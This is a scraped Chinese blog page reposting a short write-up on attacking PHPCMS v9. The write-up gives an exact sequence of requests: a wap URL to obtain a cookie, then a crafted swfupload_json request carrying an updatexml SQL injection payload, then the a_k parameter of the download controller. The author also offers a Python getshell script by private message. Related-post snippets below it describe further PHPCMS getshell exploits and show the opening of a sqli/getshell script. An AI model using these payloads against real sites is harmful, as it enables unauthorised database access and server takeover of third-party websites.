phpcms9 从注入点入手和从前台getshell

最新推荐文章于 2024-03-14 16:16:08 发布

weixin_30256505

最新推荐文章于 2024-03-14 16:16:08 发布

阅读量171

点赞数

文章标签： php

原文链接：http://www.cnblogs.com/-zhong/p/11192058.html

版权

弄了3天了这个点总结一下这三天的坑吧

0X01 注入点入手

/index.php?m=wap&c=index&a=init&siteid=1  获取cookie

传给

userid_flash=686dzK2pLsN_cv_pbJlCjvsm-ex_mCiOG90mXzt4

然后构造SQL语句

/index.php?m=attachment&c=attachments&a=swfupload_json&aid=1&src=%26id=%*27+and+updatexml(1%2cconcat(1%2c((select+@@datadir+limit+0%2c1)))%2c1)%23%26m%3d1%26f%3dhaha%26modelid%3d2%26catid%3d7%26

得到cookie

在构造传给a_k参数

/index.php?m=content&c=down&a_k=

2前台getshell附件在我的机器里面要得可以私信我 py脚本

太菜了多学习

转载于:https://www.cnblogs.com/-zhong/p/11192058.html

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

weixin_30256505

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
复制链接

分享到 QQ

分享到新浪微博

扫一扫

PHPCMS v9本地文件包含漏洞Getshell

fansenliangren的博客

12-01

1478

文件包含是指程序代码在处理包含文件的时候没有严格控制。导致用户可以构造参数包含远程代码在服务器上执行，并得到网站配置或者敏感文件，进而获取到服务器权限，造成网站被恶意删除，用户和交易数据被篡改等一系列恶性后果......

phpcmsV9后台模板

06-14

就下我就对了，我浪费了50积分下载“phpcmsV9后台模板”，都是我这样的。说的不清楚的不要下，要积分高的不要下。说“由于官方后台不好看，而且对客户来说使用过程中容易起各种纠纷，该后台模板全新黑色后台，去除...

参与评论您还未登录，请先登录后发表或查看评论

php %3cimg,phpcmsV9.6.0注入+前台getshell

weixin_39957186的博客

03-18

4015

# phpcms v9.6.0 sqli and getshell# code by : whoam1# blog : http://www.cnnetarmy.comimportrequestsimportrandomimportstringimporthashlibimportreimportthreadingdefsqli(host):try:url1='{}/index.php?m=w...

phpcms9-6-0 一键getshell工具

ai74583的博客

04-10

1031

介绍一键化python 1.py http://xxx.com,如果是批量直接运行py文件即可待办 [] 加入对有验证码phpcms网站的支持 [] 加入批量(已完成) 说明依赖库的安装pip install requests 代码 # -*- coding:utf-8 -*- ''' ---------------------- Author : Akkuman Bl...

phpCMS后台getshell

qq_45300786的博客

05-12

1500

这个phpCMS我们需要添加2个专题，才能getsheell 第一个专题在“内容”模块的“专题”，添加新“专题”，新建一个专题，然后记住“专题名称”，在“专题导读写入webshell代码”（如下图）第二个专题在创建专题扩展哪里的模板index改成第一次专题../../../../html/special/moon/index提交自动在网站根目录下生成moon.php 查看文件生成成功 shell工具成功连接 ...

getshell.php,PHPCMS后台Getshell

weixin_36416921的博客

04-08

330

后台getshell~'pc_version' => 'V9.5.5',//phpcms 版本号'pc_release' => '20140430',//phpcms 更新日期PHPCMS后台能够自定义url规则：其中可以定义是否生成静态文件。生成静态文件这一块，如果处理不好后缀，经常容易直接getshell。那么我们看看phpcms是怎么处理这个url重写的。/phpcms/modu...

PHPCMS v9.5.6 通杀getshell(前台)

aixuan9365的博客

05-27

509

漏洞url：http://wooyun.jozxing.cc/static/bugs/wooyun-2014-062881.html 很好的fuzz思路。文章提到：文件名前面的数字是被"干掉"字符的十进制数字，可以看出%81--%99会被干掉.该特性雷同Windows下对"."和" "(空格)， ::$DATA的忽略。这个特性可以用来绕过安全狗，比如 xxx.php. ...

phpcms v9 get标签各种调用代码整理

09-29

在当前的IT项目中，内容管理系统（CMS）扮演着不可或缺的角色，特别是对于网站开发与维护。...通过这些知识点，开发者可以更好地掌握如何高效地从PHPCMS v9获取所需的数据，并通过模板输出到前端页面。

phpcmsv9最新利用工具

04-01

对于phpcmsV9，若存在这样的漏洞，就需要及时更新系统，修复已知的SQL注入点。跨站脚本（XSS）漏洞则允许攻击者在用户的浏览器上执行恶意脚本。通过在网页中插入恶意JavaScript代码，攻击者可能盗取用户的会话 ...

PHPCMS2008广告模板SQL注入漏洞修复

10-21

PHPCMS2008是一款流行的开源内容管理系统，然而，如标题所示，它存在一个广告模板SQL注入漏洞，这个问题在2008年的版本中尤为突出。SQL注入是一种常见的网络安全威胁，允许攻击者通过操纵输入数据来执行恶意SQL命令...

如何解决phpcms V9后台拿shell时出错问题

09-29

很多新手朋友都遇到过phpcms V9后台拿shell时出错，下面为大家介绍个不错的解决方法，希望对大家有所帮助

PHPCMS V9专题模块注入漏洞的分析与修复方法

09-29

### PHPCMS V9专题模块注入漏洞的分析与修复方法 #### 一、漏洞背景介绍 PHPCMS V9是一款非常流行的开源内容管理系统(Content Management System, CMS)，它提供了丰富的功能来帮助用户构建和管理网站。然而，即便...

phpcms v9 前台无限制GETSHELL

weixin_33842328的博客

04-03

1047

0x01:介绍PHPCMS V9（后面简称V9）采用PHP5+MYSQL做为技术基础进行开发。V9采用OOP（面向对象）方式进行基础运行框架搭建。模块化开发方式做为功能开发形式。框架易于功能扩展，代码维护，优秀的二次开发能力，可满足所有网站的应用需求。 5年开发经验的优秀团队，在掌握了丰富的WEB开发经验和CMS产品开发经验的同时，勇于创新追求完美的设计理念，为全球多达10万...

Phpcms V9.6.0任意文件写入getshell

主题模板站的博客

01-21

618

PHPcms v9.6的任意文件上传的漏洞，已经潜伏半年多的一个漏洞。该漏洞可以在用户注册界面以未授权的情况下实现任意文件上传。phpcms v9.6正常部署phpcms v9.6就好。复现过程中，可以在用户注册页面通过POST提交：在src后面跟上自己shell的url。注意是要.txt格式写的shell。网上已经有逆向分析的过程，这次我来正向的分析一下这个洞。首先看到用户注册的模块，位于phpcms/modules/member/index.php的register方法中。代码很多，一点点往下看：完成了

PHPCMS v9 Getshell（Apache）

收集盒 Book box

03-05

1862

公开时间： 2013-03-04 简要描述： phpcms v9 getshell (apache) 详细说明：漏洞文件：phpcms\modules\attachment\attachments.php 　public function crop_upload() { if (isset($GLOBALS["HTTP_RAW_POST_DATA"])) {

PHPCMS v9.6 Getshell方法大全

hacker0ne的博客

11-15

5758

phpcms9.6.x后台getshell几种方法

phpcms上传导致getshell详解及案例

phpcms9 从注入点入手和 从前台getshell

phpcms9 从注入点入手和从前台getshell